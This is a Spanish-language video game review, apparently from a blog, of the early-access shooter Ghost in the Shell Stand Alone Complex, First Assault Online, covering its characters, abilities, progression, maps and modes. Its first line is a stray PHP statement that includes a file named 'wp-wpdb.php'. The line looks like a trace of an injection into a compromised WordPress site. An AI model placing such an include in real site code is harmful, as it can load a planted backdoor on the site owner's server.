if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Ghost in the Shell Stand Alone Complex, First Assault Online – La Fortaleza de LeChuck

Análisis Ghost in the Shell Stand Alone Complex, First Assault Online

La mundialmente famosa licencia Ghost in the Shell recibe una adaptación al mundo de los videojuegos en forma de shooter en primera persona llamada Ghost in the Shell Stand Alone Complex, First Assault Online. Su formato free to play (todavía en Early Acces) traido de la mano de Neople y Nexon se presenta con un juego que cumple correctamente en todos sus aspectos pero ni arriesga ni consigue aprovechar el tirón de su franquicia.

Ghost in the Shell Stand Alone Complex, First Assault Online

Antes de entrar a profundizar en este F2P, disponible únicamente en Steam, no está de más contextualizar el juego en el universo del que bebe su ambientación, historia y personajes. Ghost in the Shell no es sino la obra maestra del japonés Masamune Shirow y se trata de uno de los mangas (y posteriormente anime) más influyentes y mundialmente conocidos.

De ambientación cyberpunk, el argumento de esta obra, creada en los 80, gira entorno a la Mayor Motoko Kusanagi, un cyborg perteneciente a la Sección 9, integrante del departamento de seguridad de un Tokyo futurista. Sin embargo, pese a la calidad del manga, el reconocimiento internacional no llegaría hasta 1995, con el lanzamiento de la película homónima. Si bien es cierto que ya existían multitud de historias de corte cyberpunk, Ghost in the Shell consiguió dotar de una gran profundidad un género que en esa época explotaba con mayor intensidad su vertiente estética como principal atractivo en detrimento de un plano argumental en ocasiones descuidado. Una compleja y adulta historia en armonía con su enorme calidad técnica y visual consiguió que, junto a Akira, la animación japonesa se mostrase en auge de cara al público internacional.

Ghost in the Shell película

Ghost in the Shell ha recibido, a lo largo de los años, multitud de ovas y series anime (lógicamente), con mayor o menor acierto a la hora de contar las aventuras de la Mayor Kusanagi. Los videojuegos tampoco son terreno desconocido para la franquicia, que ha tenido diversas adaptaciones previas que han pasado sin pena ni gloria por las distintas plataformas en las que ha aparecido. Ya contextualizada la licencia pasamos a desentrañar lo que esconde este shooter free to play de Neople y Nexon.

Ante todo me gustaría destacar que Ghost in the Shell Stand Alone Complex, First Assault Online es un juego en Early Access, por lo que todo está sujeto a cambio en forma futuros parches y actualizaciones y que, de momento, se encuentra disponible junto a diversos packs de contenido en espera de que el juego se lance oficialmente.
Dicho esto, lo primero que vemos es el aspecto gráfico y estético del juego, que toma prestado el de la serie Stand Alone Complex (2002). Una decisión, en mi opinión, bastante acertada, ya que se aleja del aspecto más adulto del manga original o de la película de 1995, a la vez que huye (de nuevo, en mi opinión) de los cuestionables rediseños más modernos de la saga, haciendo que tenga la versión más adecuada de cara a trasladar el universo del Japón futurista a los videojuegos.

Al comenzar por vez primera Ghost in the Shell Stand Alone Complex, First Assault Online realizamos un pequeño tutorial que nos sirve para familiarizarnos con el sistema de control y los distintos aspectos jugables (principalmente las habilidades) y, tras terminarlo, nos pide que elijamos a uno de los personajes protagonistas de la serie y ojo, porque solo podremos controlar a este personaje hasta alcanzar el nivel 3 de progresión y posteriormente el 5, momentos en los que podremos desbloquear otros dos personajes jugables. Esto no se advierte en ningún momento y la elección del personaje se lleva a cabo sin haber tenido oportunidad de probarlo antes, únicamente disponemos de una descripción de su habilidad única como aspecto diferenciador del resto.

Y son estas habilidades (además de lo estético) lo que distingue a un personaje de otro, por lo demás son jugablemente idénticos. Las habilidades se usan con la tecla Q y tras su uso deben recargarse con el tiempo y rellenarse para poder ser usadas de nuevo, haciendo que al acabar con otros jugadores se rellenen antes. Cada una de ellas va asociada al personaje que la usa en el anime y todas cuentan con 2 niveles a la hora de cargarse.
Por poner un par de ejemplos:
– Kusanagi tiene la capacidad de hacerse invisible en el nivel 1, mientras que en el nivel 2 además de hacerse invisible ella misma otros jugadores del equipo pueden compartir su habilidad si se encuentran cerca.
– Togusa, por otra parte, puede dejar un dron que persigue y explota al encontrar un enemigo, mientras que en nivel 2 de habilidad deja dos drones en lugar de uno.

De esta forma vemos que cada personaje cuenta con su habilidad propia, siendo unas potenciables y otras compartidas con nuestros compañeros, sin llegar a ser determinantes del todo ni a ser el punto fuerte (al menos no se siente así) pero sí su elemento diferenciador. Al margen de estas habilidades, el resto del juego se presenta en forma de fps genérico de corte futurista, siguiendo la estela de los últimos Call of Duty, Titanfall, etcétera…

El conjunto cumple en todo lo que se podría esperar y gráficamente no nos encontramos una excepción. Pero ahí acaba todo, cumple sin más. No se trata de ningún portento gráfico y, a su vez, se entiende como una decisión lógica en un juego que busca ser jugado por cuanta más gente mejor, por modestos que sean sus equipos.
El modelado de los personajes es muy fiel al visto en el anime, mientras que los mapas de tamaño pequeño-mediano (de momento solo cuatro, con alguno sacado de algún capítulo del anime en concreto) ni están muy inspirados ni destacan más allá de lo visto en otros shooters online: tenemos el típico polígono con sus naves industriales, el complejo militar con diversos pasillos y caminos, un almacen portuario más centrado en el combate a corta distancia y una pequeña ciudad con varios tramos y atajos.

Jugablemente Ghost in the Shell Stand Alone Complex, First Assault Online se trata de un juego correcto, suficientemente frenético a la hora de movernos por el mapa y acabar con los enemigos, bastando un cargador para acabar con hasta tres enemigos e intentando propiciar el trabajo en equipo sin llegar a la acción más táctica.
Las distintas armas que encontramos las vamos consiguiendo muy poco a poco, por lo que la progresión es lenta. Conforme vamos terminando partidas se nos otorgan una serie de puntos de experiencia y créditos con los que compramos armas y piezas para su personalización que debemos desbloquear previamente con su uso continuado. Progresamos muy muy muy poco a poco ya que, salvo al subir de nivel, los créditos que nos otorgan (incluso ganando y quedando primeros en las partidas) es muy escaso en comparación a lo que cuestan las armas y piezas, acercándose peligrosamente al modelo Pay to Win, aunque yo no he tenido oportunidad de ver desequilibrios entre jugadores a causa de esto.

Las citadas armas se clasifican en principales y secundarias y son las genéricas por defecto en un juego de acción, ni resultan especialmente satisfactorias en su uso ni sorprenden por su diseño: tenemos subfusiles, ametralladoras, escopetas, rifles de francotirador, pistolas y poco más, lo de siempre…
Tras cada partida se nos otorga de forma aleatoria un bonus de partida (+10% de experiencia, por ejemplo) o una mejora o ‘power-up’ temporal que equipamos en las ranuras físicas que vamos desbloqueando en nuestro personaje, cosa que no consigue hacernos recordar que, en todo momento, estamos encarnando a un cyborg, ya que el juego peca de poco inmersivo, desperdiciando así la atmósfera (doblado únicamente en inglés) y el rico universo de la saga. Una pena.

No soy tan pesimista como para destacar únicamente lo negativo del título (de la música mejor ni hablamos) y, si bien es cierto que el tiempo que trancurre entre partida y partida en ocasiones se hace muy largo (llegando a los 5 minutos a veces) los combates se resuelven muy rápidamente y el tiempo de respawn ronda de 2 a 5 segundos tras nuestra muerte, por lo que volver a la acción es casi instantáneo.
He estado probando los distintos servidores (uno por zona geográfica) en los que no suelen faltar jugadores y únicamente he sufrido lag en unas pocas partidas en las aproximadamente 10 horas de juego que dice Steam que llevo jugadas.

En cuanto a la variedad, se nos presentan 3 modos de juego para 16 jugadores: el clásico duelo a muerte por equipos, demolición y dominación. Los modos de duelo por equipos o demolición (defensa y ataque por turnos) no nos descubren nada nuevo. Sin embargo, en Dominación es quizás donde encontramos el detalle más Ghost in the Shell del juego: los Tachikoma.
En este modo de juego se nos presentan zonas que hay que conquistar permaneciendo en ellas mientras evitamos que el equipo rival nos arrebate la citada zona. Al hacer nuestro cada punto de conquista aparece uno de los famosos mechas de la serie, los Tachikoma. Este compañero es controlado por la IA y supone un gran apoyo en el ataque y la conquista de las otras zonas, pero si un jugador rival se acerca lo suficiente (con el riesgo que ello entraña) puede hackear a nuestro robótico aliado, haciéndolo mucho más vulnerable. Este es, con toda seguridad, el modo de juego más elaborado y táctico de cuantos presenta el shooter de Neople, además de ser el más inspirado y que más se esfuerza en recordar el mundo en el que se desarrolla la acción.

Pese a todos los aspectos negativos, Ghost in the Shell Stand Alone Complex, First Assault Online es un FPS online entretenido de jugar, relativamente dinámico y con el beneficio de la duda que puede llegar a plantear un juego en Early Access de Steam. Ofrece la posibilidad futura de introducir diversas mejoras gráficas, técnicas, jugables y de contenido para un free to play que de momento anda algo escaso, por lo que hay que centrar las esperanzas en que desde Nexon se escuche el feedback de los jugadores y se trabaje en ampliar contenidos.
Como videojuego nos encontramos un producto de buena calidad pero como adaptación del anime deja mucho que desear y, quizás, este podría ser el aspecto que más duela a los seguidores de Ghost in the Shell (que creo haber mencionado ya unas 13 veces). No es el género jugable que más podría aprovechar el universo cyberpunk de la serie, y no me refiero a su vertiente shooter en primera persona, sino al multijugador de acción genérico. Teniendo un como ejemplo Deus Ex delante es evidente que este anime puede funcionar en un videojuego pero (de momento), por desgracia, Ghost in the Shell Stand Alone Complex, First Assault Online sale al mercado sin el ‘ghost’ al que hacen referencia en sus distintas versiones y pasa a formar parte de la historia de las adaptaciones que no pasaron a la historia.